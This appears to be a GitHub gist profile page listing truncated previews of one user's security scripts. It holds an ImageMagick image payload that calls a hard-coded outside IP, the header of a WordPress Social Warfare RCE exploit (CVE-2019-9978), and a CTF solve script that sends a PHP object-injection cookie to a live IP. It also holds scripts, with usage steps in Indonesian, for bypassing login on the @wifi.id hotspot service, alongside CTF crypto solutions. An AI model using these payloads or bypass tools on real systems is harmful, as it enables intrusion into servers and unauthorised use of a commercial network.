Skip to content

Instantly share code, notes, and snippets.

View budanthara's full-sized avatar
🏠
Working from home

Ida Bagus Budanthara budanthara

🏠
Working from home
  • Indonesia
View GitHub Profile
push graphic-context
viewbox 0 0 640 480
fill 'url(http://103.200.7.150:8070/wew)'
pop graphic-context
# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 )
# Date: March, 2019
# Researcher: Luka Sikic
# Exploit Author: hash3liZer
# Download Link: https://wordpress.org/plugins/social-warfare/
# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
# Github: https://github.com/hash3liZer/CVE-2019-9978
# Version: <=3D 3.5.2
# CVE: CVE-2019-9978
@budanthara
budanthara / wordpress_content_injection.py
Last active February 17, 2024 07:16
Wordpress content injection exploit by snoww0lf
#! /usr/bin/env python
"""
Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
Wordpress Version Affected: 4.7.0/4.7.1
2017 - Coded by snoww0lf.
"""
import re
import requests
import re
from urllib import quote_plus
def main():
cookie = quote_plus('760463360e4919ca238d1566fc26661fa:1:{i:0;O:16:"GPLSourceBloater":1:{s:6:"source";s:8:"flag.php";}}')
url = "http://104.154.70.126:10888/"
req = requests.get(url, cookies=dict(todos=cookie))
print 'hxp{'+' '.join(re.findall(r'hxp{(.*?)}', req.text)[0].split("&nbsp;"))+'}'
@budanthara
budanthara / @wifi.id_bypassv2.py
Last active September 30, 2020 07:31
@wifi.id bypass v2
import os
import mechanize
import urllib
import urllib2
import re
import json
def rand_gen_phone():
phone = '081'
for i in range(9):
@budanthara
budanthara / @wifi.id_bypass.py
Last active December 27, 2022 13:30
Buat bypass autentikasi login @wifi.id
"""
@WIFI.ID BYPASS WITH PYTHON
Cara menggunakan:
- Install python.
- Install library mechanize.
- Jalankan dengan perintah: python namafile.py
- Tunggu dan silahkan mencoba untuk browsing.
"""
@budanthara
budanthara / badboy.py
Last active April 27, 2016 18:08
...
# Usage: python filename.py originalfile collisionfile
# snoww0lf
import sys
from hashlib import *
coll_find = [19, 45, 59, 83, 109, 123]
d_out = []
def to_hex_conversion(data):
@budanthara
budanthara / wisely.py
Created December 11, 2015 14:48
Wisely Bit
import string
cipher = "233 129 9 5 130 194 195 39 75 229"
def decode():
flag = ""
strs = string.letters + "0123456789" + "{}_~*&^%$#@!()-"
to_list = ' '.join(strs).split(' ')
user_str = []
for char in strs:
"""
HackDatKiwi CTF 2015 - Phone Lock 1
"""
import hashlib
import random
salt = "abb6f243fb340025d312c2a41cfa8beb"
valid = "00a1e1072212ceae0445dcffde045da4"
@budanthara
budanthara / search.py
Created November 5, 2015 12:38
SchoolCTF 2015 PPC 200
def search():
flag = ''
start = 'start.txt'
st = True
while st:
with open(start, 'r') as f:
x = f.readlines()
c = x[0]
start = c[6:].replace("\n", "")
print "Membaca file %s " % (start)